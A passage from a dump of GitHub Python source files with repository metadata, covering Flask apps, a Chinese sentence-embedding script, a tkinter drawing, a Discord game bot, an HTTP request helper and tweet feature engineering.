\n \n \n '''\n\n@app.route('/baixar')\ndef download():\n path = \"output/saida.txt\"\n return send_file(path, as_attachment=True)\n\n@app.route('/do')\ndef downloadTxt():\n return'''\n \n \n \n \n \n '''\n\nif __name__ == '__main__':\n # This is used when running locally only. When deploying to Google App\n # Engine, a webserver process such as Gunicorn will serve the app. You\n # can configure startup instructions by adding `entrypoint` to app.yaml.\n app.run(host='127.0.0.1', port=8080, debug=True)\n# [END gae_python3_app]\n# [END gae_python38_app]\n","repo_name":"maonaparede/testAppEngine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2647,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"3213790048","text":"#!/usr/bin/python3.6\r\n# -*- coding: utf-8 -*-\r\n# @Time : 2022/7/14 16:38\r\n# @Author : Liangliang\r\n# @File : execution.py\r\n# @Software: PyCharm\r\n\r\nimport jieba\r\nimport pandas as pd\r\nimport s3fs\r\nimport time\r\nimport math\r\nimport numpy as np\r\nimport argparse\r\nimport datetime\r\nimport os\r\nimport base64\r\nfrom multiprocessing.dummy import Pool\r\nos.system(\"pip install dataclasses\")\r\nos.system(\"pip install gensim\")\r\nos.system(\"pip install tarfile\")\r\nfrom gensim.models import KeyedVectors\r\nimport requests\r\nimport tarfile\r\nresult = 0\r\ncorpus = 0\r\n\r\ndef multiprocessingWrite(file_number,data,output_path,count):\r\n #print(\"开始写第{}个文件 {}\".format(file_number,datetime.datetime.now()))\r\n n = len(data) # 列表的长度\r\n #s3fs.S3FileSystem = S3FileSystemPatched\r\n #fs = s3fs.S3FileSystem()\r\n with open(os.path.join(output_path, 'pred_{}_{}.csv'.format(count,int(file_number))), mode=\"a\") as resultfile:\r\n if n > 1:#说明此时的data是[[],[],...]的二级list形式\r\n for i in range(n):\r\n line = \",\".join(map(str, data[i])) + \"\\n\"\r\n resultfile.write(line)\r\n else:#说明此时的data是[x,x,...]的list形式\r\n line = \",\".join(map(str, data)) + \"\\n\"\r\n resultfile.write(line)\r\n print(\"第{}个大数据文件的第{}个子文件已经写入完成,写入数据的行数{} {}\".format(count,file_number,n,datetime.datetime.now()))\r\n\r\nclass S3FileSystemPatched(s3fs.S3FileSystem):\r\n def __init__(self, *k, **kw):\r\n super(S3FileSystemPatched, self).__init__(*k,\r\n key=os.environ['AWS_ACCESS_KEY_ID'],\r\n secret=os.environ['AWS_SECRET_ACCESS_KEY'],\r\n client_kwargs={'endpoint_url': 'http://' + os.environ['S3_ENDPOINT']},\r\n **kw\r\n )\r\n\r\n\r\nclass S3Filewrite:\r\n def __init__(self, args):\r\n super(S3Filewrite, self).__init__()\r\n self.output_path = args.data_output\r\n\r\n\r\ndef write(data, args, count):\r\n #注意在此业务中data是一个二维list\r\n n_data = len(data) #数据的数量\r\n n = math.ceil(n_data/args.file_max_num) #列表的长度\r\n start = time.time()\r\n for i in range(0,n):\r\n multiprocessingWrite(i, data[i * args.file_max_num:min((i + 1) * args.file_max_num, n_data)],\r\n args.data_output, count)\r\n cost = time.time() - start\r\n print(\"write is finish. write {} lines with {:.2f}s\".format(n_data, cost))\r\n\r\ndef getEmbedding(sentence, i, roleid, args, count):\r\n '''sentences:分词的句子,为base64编码,需要先解码\r\n i:序号\r\n roleid: 数据的id\r\n '''\r\n sentences = str(base64.b64decode(sentence), 'utf-8')\r\n global result\r\n if i%100000 == 0:\r\n print(\"第{}个文件的第{}个任务开始执行! {}\".format(count, i, datetime.datetime.now()))\r\n flag = False #表示当前的sentences的分词结果是否都可以查到词向量 False: 表示所有的词都没有词向量 True:表示至少有一个词可以查到词向量\r\n value = np.zeros((1, args.dim))\r\n if len(sentences) > 0:\r\n words = jieba.cut(sentences)\r\n counts = 0\r\n for word in words:\r\n try:\r\n value = value + corpus[word]\r\n counts = counts + 1\r\n flag = True\r\n except KeyError:\r\n pass\r\n else:\r\n flag = False\r\n if flag == True:#有句子向量\r\n value = value/counts\r\n value = value.astype(\"str\")\r\n result[i, 0] = str(roleid)\r\n result[i, 1] = sentence\r\n result[i, 2::] = value\r\n else:#无句子向量输出\r\n result[i, 0] = str(roleid)\r\n result[i, 1] = sentence\r\n result[i, 2::] = \"no\"\r\n if i%100000 == 0:\r\n print(\"第{}个文件的第{}个任务执行完成! {}\".format(count, i, datetime.datetime.now()))\r\n\r\nif __name__ == \"__main__\":\r\n #配置参数\r\n parser = argparse.ArgumentParser(description='算法的参数')\r\n parser.add_argument(\"--dim\", help=\"单词表中词embedding的维数\", type=int, default=100)\r\n parser.add_argument(\"--thread_num\", help=\"多线程编程的线程数目\", type=int, default=1000)\r\n parser.add_argument(\"--file_max_num\", help=\"单个csv文件中写入数据的最大行数\", type=int, default=5000000)\r\n parser.add_argument(\"--data_input\", help=\"输入数据的位置\", type=str, default='')\r\n parser.add_argument(\"--data_output\", help=\"数据的输出位置\", type=str, default='')\r\n parser.add_argument(\"--tb_log_dir\", help=\"日志位置\", type=str, default='')\r\n args = parser.parse_args()\r\n print(\"开始下载word embedding文件! {}\".format(datetime.datetime.now()))\r\n #远程下载文件 https://zhuanlan.zhihu.com/p/106309634\r\n url = 'https://ai.tencent.com/ailab/nlp/en/data/tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz'\r\n res = requests.get(url, stream=True)\r\n total_length = int(res.headers.get('content-length'))\r\n with open(\"tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz\", \"wb\") as pypkg:\r\n for chunk in res.iter_content(chunk_size=1024):\r\n if chunk:\r\n pypkg.write(chunk)\r\n print(\"词嵌入文件下载完成, 开始解压下载文件! {}\".format(datetime.datetime.now()))\r\n #解压文件\r\n tar = tarfile.open(\"tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz\")\r\n tar.extractall(path=\"tencent-ailab-embedding-zh-d100-v0.2.0\")\r\n tar.close()\r\n print(\"词嵌入文件解压完成! {}\".format(datetime.datetime.now()))\r\n #删除已下载的tar.gz文件,节省存储空间\r\n os.remove(\"tencent-ailab-embedding-zh-d100-v0.2.0.tar.gz\")\r\n #打印文件首行看文件是否正常\r\n f = open(\"./tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0.txt\",'r',encoding=\"utf8\")\r\n print(\"词嵌入文件的首行信息:\",f.readline())\r\n f.close()\r\n\r\n # 读取数据文件\r\n path = args.data_input.split(',')[0]\r\n s3fs.S3FileSystem = S3FileSystemPatched\r\n fs = s3fs.S3FileSystem()\r\n input_files = sorted([file for file in fs.ls(path) if file.find(\"part-\") != -1])\r\n count = 0\r\n corpus = KeyedVectors.load_word2vec_format('./tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0.txt', binary=False,\r\n encoding=\"utf8\")\r\n #删除txt文件节省空间内存11G\r\n os.remove(\"./tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0/tencent-ailab-embedding-zh-d100-v0.2.0.txt\")\r\n #处理数据\r\n for file in input_files:\r\n pool = Pool(processes=args.thread_num)\r\n count = count + 1\r\n print(\"当前正在处理第{}个文件,文件路径:{}......\".format(count, \"s3://\" + file))\r\n data = pd.read_csv(\"s3://\" + file, sep=',', header=None, usecols=[0,1]).astype('str') # 读取数据,第一列为id,第二列为中文txt\r\n n = data.shape[0]\r\n result = np.zeros((n, args.dim + 2)).astype(\"str\")\r\n for i in range(n):\r\n pool.apply_async(func=getEmbedding, args=(data.iloc[i, 1], i, data.iloc[i, 0], args, count,))\r\n pool.close()\r\n pool.join()\r\n write(result.tolist(), args, count)\r\n print(\"已完成第{}个文件数据的推断! {}\".format(count, datetime.datetime.now()))","repo_name":"hmliangliang/bertSentencesEmbedding","sub_path":"execution.py","file_name":"execution.py","file_ext":"py","file_size_in_byte":7562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10002370954","text":"import math\nimport numpy as np\nimport random\nimport tkinter as tk\nimport time\n\nfrom PIL import Image\n\nroot = tk.Tk()\n\n# root.geometry(\"300x300-1000-1000\")\n# root.state('zoomed')\n\n\nroot.title(\"Leaf Mandala\")\n\nwidth = 500\nheight = 500\nwin = tk.Canvas(root,width=width ,height=height)\nwin.pack()\n\nnLines = 12\nangle = (2 * math.pi) / float(nLines)\nlineAngles = [x for x in range(nLines)]\nallLines = []\n# Radius decreases each time\nfor radius in range((min(width,height) // 2) - 30,0,-50):\n # If ABC is a right angled triangle, with A and B being two points in the base and C on the top being a point on the hypotenuse\n # Let Angle(ABC) be 90 degree, and let Angle(BAC) = Angle(ACB) = 45 degrees\n # Theta will be the angle at which a line will be drawn with respect to the center\n for theta in lineAngles:\n # This line shall be the hyptenuse\n C = [(math.cos(theta * angle) * (radius)) + width / 2, (math.sin(theta* angle) * (radius )) + height / 2 ]\n # B is at the center\n B = [(width / 2),(height / 2)]\n # Since now we know C,B, we have to find A\n # A regular pythagorean formula wont do the job as it gives distance, but we want coordinates\n # You shall hence have to use some geometry to figure out the point. The below link explains it perfectly\n # https://math.stackexchange.com/questions/927802/how-to-find-coordinates-of-3rd-vertex-of-a-right-angled-triangle-when-everything\n \n # We want to make a leaf, and hence a leaf when split in center forms two traingles.\n # Due to this we shall find two A's\n # This is also directly achieved as a quadratic equation shall return two values\n x = (C[0] + B[1] + B[0] - C[1]) / 2\n A = [ x, C[1] - B[0] + x]\n xd = (C[0] - B[1] + B[0] + C[1]) / 2\n Ad = [xd,C[1] - xd + B[0]]\n # Create both the sides of the lead and smoothen it\n win.create_line(C[0],C[1],A[0],A[1],B[0],B[1],smooth=True)\n win.create_line(C[0],C[1],Ad[0],Ad[1],B[0],B[1],smooth=True)\n win.update()\n # time.sleep(1)\n\n\n\n# Can save using this\n\n# win.pack()\n# win.update()\n# win.postscript(file=\"file_name.eps\", colormode='color')\n# img = Image.open(\"file_name.eps\")\n# img.save('filename.png')\n\nroot.mainloop()","repo_name":"TheNova22/tkArt","sub_path":"leafMandala.py","file_name":"leafMandala.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"53"} +{"seq_id":"14240352866","text":"import discord\nimport os\nimport random\nimport re\n\nimport battleship\nimport tictactoe\nimport hangman\n\nclient = discord.Client()\n\n@client.event\nasync def on_ready():\n print('{0.user} has connected'.format(client))\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n\n if \"gamebot!help\" in message.content:\n embed = discord.Embed(\n title=\"Gamebot\",\n color=discord.Color.from_rgb(252, 164, 28)\n )\n embed.add_field(name=\"*The best way to play games on Discord*\", value=\"We have relocated to https://actiniumn404.github.io/Gamebot/ because of the charactor limit, so please go there.\")\n embed.set_author(name=f\"Gamebot\")\n await message.reply(embed=embed, mention_author=False)\n\n if \"<@!886304776042737675>\" in message.content:\n await message.channel.send(\"Hello! It's a good day for a game right?\")\n\n rps = re.match(\"!rps (r|p|s)\", message.content)\n if rps:\n move = str(rps.group(1)).lower()\n choice = random.choice([\"rock\", \"paper\", \"scissors\"])\n j = {\n \"r\":{\n \"rock\":\"we tied\",\n \"paper\":\"I won\",\n \"scissors\":\"you won\"\n },\n \"p\":{\n \"rock\":\"you won\",\n \"paper\":\"we tied\",\n \"scissors\":\"I won\"\n },\n \"s\":{\n \"rock\":\"I won\",\n \"paper\":\"you won\",\n \"scissors\":\"we tied\"\n }\n }\n\n convert = {\"r\":\"rock\", \"s\":\"scissors\", \"p\":\"paper\"}\n\n embed = discord.Embed(\n title=\"Rock, Paper, Scissors\",\n color=discord.Color.from_rgb(252, 164, 28)\n )\n embed.set_author(name=f\"Gamebot\")\n if move in [\"r\", \"p\", \"s\"]:\n embed.add_field(name=\"Results\", value=f\"You picked {convert[move]} and I picked {choice}. Therefore, {j[move][choice]}.\")\n else:\n embed.add_field(name=\"Results\", value=f\"ERROR. Your choice was not understood. Please type either r, p, or s for rock, paper, and scissors respectively\")\n embed.set_footer(text=f\"For all gamebot commands, type gamebot!help\")\n\n await message.reply(embed=embed, mention_author=False)\n\n\n newhangman = re.match(\"!newhangman (.*)\", message.content)\n if newhangman:\n await hangman.new(message, newhangman)\n\n hangmanguess = re.match(\"!hangman ([0-9]+) guess ([a-zA-Z]+)\", message.content)\n if hangmanguess:\n await hangman.guess(message, hangmanguess)\n \n endhangman = re.match(\"!hangman ([0-9]+) end game\", message.content)\n if endhangman:\n await hangman.end(message, endhangman)\n\n # Tic tack toe\n ttt = re.match(\"!newtictactoe (.*)\", message.content)\n if ttt:\n await tictactoe.new(message, ttt)\n\n tttinvite = re.match(\"!tictactoe ([0-9]+) (accept|decline)\", message.content)\n if tttinvite:\n await tictactoe.invite(message, tttinvite)\n\n tttplay = re.match(\"!tictactoe ([0-9]+) play ([A-Ca-c])([1-3])\", message.content)\n if tttplay:\n await tictactoe.play(message, tttplay)\n\n # battleship\n newship = re.match(\"!newbattleship\\n```\\n(.*)\\n```\", message.content, flags=re.MULTILINE | re.DOTALL)\n if newship:\n matrix = newship.group(1)\n matrix = matrix.split(\"\\n\")\n matrix = [x.replace(\"_\", \" \").split(\" \") for x in matrix]\n await battleship.new(message, matrix) \n\n\nclient.run(os.getenv('TOKEN'))","repo_name":"actiniumn404/Gamebot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70492540648","text":"from flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_migrate import Migrate\nfrom flask_login import LoginManager\nfrom flask_mail import Mail\nfrom flask_admin import Admin\n# from flask_bouncer import requires, ensure, Bouncer\nimport logging\nfrom logging.handlers import SMTPHandler\nfrom logging.handlers import RotatingFileHandler\nimport os\n# import pusher\nfrom config import Config\n\ndb = SQLAlchemy()\nmigrate = Migrate()\nlogin = LoginManager()\nmail = Mail()\nadmin = Admin()\n# login_view is used by LoginManager for pages that require\n# that user be logged-in.\nlogin.login_view = 'auth.login'\n\n# pusher = pusher.Pusher(\n# app_id=os.getenv('PUSHER_APP_ID'),\n# key=os.getenv('PUSHER_APP_KEY'),\n# secret=os.getenv('PUSHER_APP_SECRET'),\n# cluster=os.getenv('PUSHER_APP_CLUSTER'),\n# ssl=True)\n\n\ndef create_app(config_class=Config):\n app = Flask(__name__)\n app.config.from_object(config_class)\n\n # Flask-Bootstrap optional bootswatch theme\n app.config['FLASK_ADMIN_SWATCH'] = 'cosmo'\n\n db.init_app(app)\n migrate.init_app(app, db)\n login.init_app(app)\n mail.init_app(app)\n admin.init_app(app)\n\n # Register Blueprints\n from myapp.errors import bp as errors_bp\n app.register_blueprint(errors_bp)\n\n from myapp.auth import bp as auth_bp\n app.register_blueprint(auth_bp, url_prefix='/auth')\n\n from myapp.main import bp as main_bp\n app.register_blueprint(main_bp)\n\n from myapp.store import bp as store_bp\n app.register_blueprint(store_bp, url_prefix='/store')\n\n from myapp.admin import bp as admin_bp\n app.register_blueprint(admin_bp, url_prefix='/admin')\n\n # If not in debug mode, log all errors\n if not app.debug and not app.testing:\n # Emailing\n if app.config['MAIL_SERVER']:\n auth = None\n if app.config['MAIL_USERNAME'] or app.config['MAIL_PASSWORD']:\n auth = (app.config['MAIL_USERNAME'],\n app.config['MAIL_PASSWORD'])\n secure = None\n if app.config['MAIL_USE_TLS']:\n secure = ()\n mail_handler = SMTPHandler(\n mailhost=(app.config['MAIL_SERVER'], app.config['MAIL_PORT']),\n fromaddr='no-reply@' + app.config['MAIL_SERVER'],\n toaddrs=app.config['ADMINS'],\n subject='Olivier\\'s Breads Failure',\n credentials=auth, secure=secure)\n mail_handler.setLevel(logging.ERROR)\n app.logger.addHandler(mail_handler)\n\n # Logging\n if not os.path.exists('logs'):\n os.mkdir('logs')\n file_handler = RotatingFileHandler(\n 'logs/website.log', maxBytes=10240, backupCount=10)\n file_handler.setFormatter(logging.Formatter(\n '%(asctime)s %(levelname)s: \\\n %(message)s [in %(pathname)s:%(lineno)d]'))\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n\n app.logger.setLevel(logging.INFO)\n app.logger.info(\"%s startup\" % (app.config['APP_NAME']))\n\n return app\n\n\n# from myapp must be at the bottom of __init__ to avoid circular imports!!!\nfrom myapp import models\n","repo_name":"leomorpho/flask-website","sub_path":"myapp/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23626174544","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/3/11 9:46\n# @Author : Tammy\n# @Email : 18585053@qq.com\n# @File : http_request.py\n'''1)http请求类(可以根据传递的method--get/post完成不同的请求),要求有返回值。'''\nimport requests\nfrom API_7.common.public.input_log import InputLog\n\nclass HttpRequest:\n '''编写一个http请求类,可根据传递的参数完成不同的请求,要求有返回值'''\n\n @staticmethod\n def request_method(url, params, method, cookie):\n '''请求方法'''\n if method.lower() == 'get':\n try:\n resp = requests.get(url, params=params,cookies=cookie)\n return resp\n except Exception as e:\n print('请求报错:错误是{}'.format(e))\n InputLog().error(e)\n elif method.lower() == 'post':\n try:\n resp = requests.post(url, data=params,cookies=cookie)\n return resp\n except Exception as e:\n print('请求报错:错误是{}'.format(e))\n InputLog().error(e)\n\n\nif __name__ == '__main__':\n url_1 = 'http://47.107.168.87:8080/futureloan/mvc/api/member/login'\n param_1 = {'mobilephone': '18813989009', 'pwd': '123456'}\n cookie =None\n resp_1 = HttpRequest().request_method(url_1, param_1, 'Get',cookie)\n print(resp_1.json())\n cookie = resp_1.cookies\n print(cookie)\n url_2 = 'http://47.107.168.87:8080/futureloan/mvc/api/member/recharge'\n param_2 = {'mobilephone': '18813989009', 'amount': '1000.00'}\n text_2 = HttpRequest().request_method(url_2, param_2, 'Get',cookie)\n print(text_2.text)\n\n\n\n\n\n\n","repo_name":"yeyinganny/python_api_test","sub_path":"API_7/common/public/http_request.py","file_name":"http_request.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30640556676","text":"\nimport numpy as np\nimport pandas as pd\nfrom datetime import datetime\nfrom collections import Counter\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.preprocessing import MaxAbsScaler\nfrom textblob import TextBlob\nfrom textblob_fr import PatternTagger, PatternAnalyzer\nfrom nltk.corpus import stopwords \nfrom vaderSentiment_fr.vaderSentiment import SentimentIntensityAnalyzer\nfrom cleaning import cleaning, tokenize\n# for the TFID vectorizer\nfeatures_vectorizer = 200\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nNumerical feature creation functions\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n# convert timestamp to real date\ndef mois(x):\n return int(datetime.fromtimestamp(x/1000).month)\ndef jour(x):\n return int(datetime.fromtimestamp(x/1000).day)\ndef heure(x):\n return int(datetime.fromtimestamp(x/1000).hour)\n\n# create a feature from hashtags based on the frequency of features in all the tweets, the dictionary updates at each call\ndef feat_tags(data,freq_tags = None):\n tags = []\n lis = []\n cnt = Counter()\n df = data[data['hashtags'] != '[]']\n for hashtag in df['hashtags']:\n words = str(hashtag)\n lis = words[1:-1].split(',')\n for word in lis:\n tags.append(word.replace('\\'','').replace(' ',''))\n if (freq_tags != None):\n existing_tags = freq_tags.keys()\n for tag in tags:\n if (tag in existing_tags):\n cnt[tag]+= 1 + freq_tags[tag]\n else :\n cnt[tag]+= 1\n else :\n for tag in tags:\n cnt[tag]+=1\n \n feat = np.zeros(len(data))\n for index, hashtag in enumerate(data['hashtags']):\n words = str(hashtag)\n lis = words[1:-1].split(',')\n for word in lis:\n feat[index] += cnt[word.replace('\\'','').replace(' ','')]\n\n return feat, cnt\n\ndef feat_urls(data):\n urls = []\n lis = []\n cnt = Counter()\n df = data[data['urls'] != '[]']\n for url in df['urls']:\n words = str(url)\n lis = words[1:-1].split(',')\n for word in lis:\n urls.append(word.replace('\\'','').replace(' ',''))\n \n for url in urls:\n cnt[url]+=1\n feat = np.zeros(len(data))\n feat = np.zeros(len(data))\n for index, url in enumerate(data['urls']):\n words = str(url)\n lis = words[1:-1].split(',')\n for word in lis:\n feat[index] += cnt[word.replace('\\'','').replace(' ','')]\n\n return feat\n\ndef tokenize_tags(data):\n words = str(data)\n if (words!= '[]'):\n hashtags = words[1:-1].split(',')\n return [word.replace('\\'','').replace(' ','') for word in hashtags] \n else:\n return []\n\ndef tokenize_urls(data):\n words = str(data)\n if (words!= '[]'):\n urls = words[1:-1].split(',')\n return [word.replace('\\'','').replace(' ','') for word in urls] \n else:\n return []\n\n \n\ndef feat_url(data):\n feat = np.zeros(len(data))\n for index, url in enumerate(data['urls']):\n if(url !='[]'):\n feat[index] = 1\n return feat\n \n \n\n# Create sentiment analysis features, based on two methods textblob and vader\ndef sentiment_analysis(data, method = 'all'):\n if (method == 'textblob') :\n sentiment = data['text'].apply(lambda x : list(TextBlob(x, pos_tagger=PatternTagger(), analyzer=PatternAnalyzer()).sentiment))\n df_sentiments = sentiment.apply(pd.Series)\n df_sentiments.columns = ['polarity', 'subjectivity']\n return df_sentiments\n \n elif (method == 'vader') :\n #Sentiment Analysis\n SIA = SentimentIntensityAnalyzer()\n # Applying Model, Variable Creation\n data['Polarity_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['compound'])\n data['Neutral_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neu'])\n data['Negative_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neg'])\n data['Positive_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['pos']) \n return data[['Polarity Score','Neutral Score','Negative Score','Positive Score']]\n \n elif (method =='all'):\n #Sentiment Analysis\n SIA = SentimentIntensityAnalyzer()\n # Applying Model, Variable Creation\n data['Polarity_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['compound'])\n data['Neutral_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neu'])\n data['Negative_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['neg'])\n data['Positive_vader']=data[\"text\"].apply(lambda x:SIA.polarity_scores(x)['pos'])\n sentiment = data['text'].apply(lambda x : list(TextBlob(x, pos_tagger=PatternTagger(), analyzer=PatternAnalyzer()).sentiment))\n \n df_sentiments = sentiment.apply(pd.Series)\n df_sentiments.columns = ['polarity_blob', 'subjectivity_blob']\n return pd.concat([data[['Polarity_vader','Neutral_vader','Negative_vader','Positive_vader']],df_sentiments],axis=1)\n \n else:\n return None \n\n\n \n# The function which gathers all the feature creations\ndef feat_creation(data,method, freq_tags = None):\n \n features = data.drop(columns = ['text','mentions','urls','hashtags','TweetID'])\n \n features['freq_hashtags'], dic_tags = feat_tags(data, freq_tags)\n features['freq_urls'] = feat_urls(data)\n features['tokenize_tags'] = data['hashtags'].apply(lambda x: tokenize_tags(x))\n features['tokenize_urls'] = data['urls'].apply(lambda x: tokenize_urls(x))\n features['url'] = feat_url(data)\n features['month'] = data['timestamp'].apply(lambda x: mois(x))\n features['day'] = data['timestamp'].apply(lambda x: jour(x))\n features['hour'] = data['timestamp'].apply(lambda x: heure(x))\n features['nb_urls'] = features['tokenize_urls'].apply(lambda x : int(x.count('\\'')/2) )\n features['nb_tags'] = features['tokenize_tags'].apply(lambda x : int(x.count('\\'')/2) )\n \n df_sentiments = sentiment_analysis(data,method)\n features = pd.concat([features, df_sentiments], axis=1)\n return features, dic_tags\n \n# Possibility to normalize the features \n\"\"\"\n features_names = features.columns\n features = MaxAbsScaler().fit_transform(features)\n features = pd.DataFrame(features)\n features.columns = features_names\n\"\"\"\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nFunctions to transform the text in vectors\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\n\n\n# We set up an Tfidf Vectorizer that will use the top 100 tokens from the tweets. We also remove stopwords.\n# To do that we have to fit our training dataset and then transform both the training and testing dataset. \n# Here we fit the vectorizer on the most retweeted tweets (first half) from the training dataset\n# Then we transform the training data set\ndef vectorizer_fit(data):\n vectorizer = TfidfVectorizer(max_features=features_vectorizer, stop_words=stopwords.words('french')) \n vectorizer.fit(data['text'])\n text_data_vect = vectorizer.transform(data['text']).toarray()\n return text_data_vect, vectorizer\n\n# Here we transform the text in a vector based from the vectorizer trained above\ndef vectorizer_tf_test(data, vectorizer):\n text_data_vect = vectorizer.transform(data['text']).toarray()\n return text_data_vect\n\n# create an embedding dict from pretrained glove on words from tweets to vectors in 200 D\ndef creation_embedding_dict():\n embed_dict = {}\n with open('embeddings/glove.twitter.27B.200d.txt','r') as f:\n for line in f:\n values = line.split()\n word = values[0]\n vector = np.asarray(values[1:],'float32')\n embed_dict[word]=vector\n return embed_dict\n\n# transform tweets in vectors by taking the mean of the vectors of each words from the tweets \ndef tweet_to_vec(tweet, embed_dict):\n final_vec = np.zeros(200)\n for word in tweet:\n try:\n final_vec += embed_dict[word]\n except KeyError:\n pass\n return final_vec/len(tweet)\n\n# get all the tweets embbedded\ndef get_embeds(data, embed_dict):\n clean_data = cleaning(data)\n token_data = tokenize(clean_data)\n text_embeds = token_data['text'].apply(lambda x : tweet_to_vec(x,embed_dict))\n df_text_embeds = text_embeds.apply(pd.Series)\n df_text_embeds.columns = [f'embedding_{i}' for i in range(200)]\n return df_text_embeds\n\n\n\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n\nFunctions to get train and test datasets\n\n\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\n \n# method = ['textblob','vader','all']\n# function to get X_train\ndef get_X_train_df(dataset,method,embed_dict, freq_tags = None):\n features, dic_tags = feat_creation(dataset,method, freq_tags)\n text, vectorizer = vectorizer_fit(dataset)\n df_text_embeds = get_embeds(dataset, embed_dict)\n vect_text = pd.DataFrame(text,index = features.index)\n vect_text.columns = [f'vector_{i}' for i in range(features_vectorizer)]\n X_final_df = pd.concat([features,vect_text,df_text_embeds], axis=1)\n X_final_df = X_final_df.drop(columns=['retweets_count'])\n return X_final_df, dic_tags, vectorizer\n\n# function to get X_test\ndef get_X_test_df(dataset,method, vectorizer,embed_dict, freq_tags):\n features, dic_tags = feat_creation(dataset,method, freq_tags)\n text = vectorizer_tf_test(dataset, vectorizer)\n df_text_embeds = get_embeds(dataset, embed_dict)\n vect_text = pd.DataFrame(text,index = features.index)\n vect_text.columns = [f'vector_{i}' for i in range(features_vectorizer)]\n X_final_df = pd.concat([features,vect_text,df_text_embeds], axis=1)\n return X_final_df, dic_tags\n\n\n\n# function to get all the datasets\ndef get_all_df(X_train, X_test, eval_data, method = 'all'):\n embed_dict = creation_embedding_dict()\n print('Embedding matrix created ! \\n')\n X_test = X_test.drop(columns=['retweets_count'])\n X_train = X_train.drop_duplicates()\n X_train, dic_tags, vectorizer = get_X_train_df(X_train,method,embed_dict)\n print('Features created for X_train ! \\n')\n X_test, final_freq_tags = get_X_test_df(X_test,method,vectorizer,embed_dict, dic_tags)\n print('Features created for X_test ! \\n')\n X_eval, dic = get_X_test_df(eval_data,method,vectorizer,embed_dict, final_freq_tags)\n print('Features created for X_eval ! \\n')\n return X_train, X_test, X_eval\n ","repo_name":"ArthurDivanovic/Retweet-predictions","sub_path":"scripts/features_creations.py","file_name":"features_creations.py","file_ext":"py","file_size_in_byte":10422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27955638085","text":"import pandas as pd\nimport numpy as np\nimport regex as re\nimport spacy\nimport en_core_web_lg\n\n\ndef preprocess_column(raw_texts):\n \"\"\"\n Preprocess the metaphor column by preprocessing each metaphor and returning\n the resulting array\n Args:\n raw_texts: (list(string)) the metaphors to be processed\n \"\"\"\n nlp = en_core_web_lg.load()\n return [preprocess_text(s,nlp) for s in raw_texts]\n\ndef preprocess_text(raw_text,nlp):\n \"\"\"\n Preprocesses the raw metaphor by removing sotp words and lemmatizing the words\n Args:\n raw_text: (string) the original metaphor text to be processed\n nlp: (spacy language object)\n \"\"\"\n \n tokens=[]\n for token in nlp(raw_text):\n if not token.is_stop:\n tokens.append(token.lemma_)\n return \" \".join(tokens)\n\ndef trim_text(t):\n \"\"\"\n finds the beginning and ending of a number in the original string and slices out the number\n Args:\n t: (string) token to be processed\n \"\"\"\n\n if len(t)<1:\n return t\n start_index=0\n end_index=len(t)-1\n while not t[start_index].isnumeric() and start_index-1:\n end_index-=1\n return t[start_index:end_index+1].replace(\",\",'.')\n\ndef read_text(file):\n \"\"\"\n Read the katz dataset from the txt file provided\n Args:\n file: (string) file path\n \"\"\"\n\n 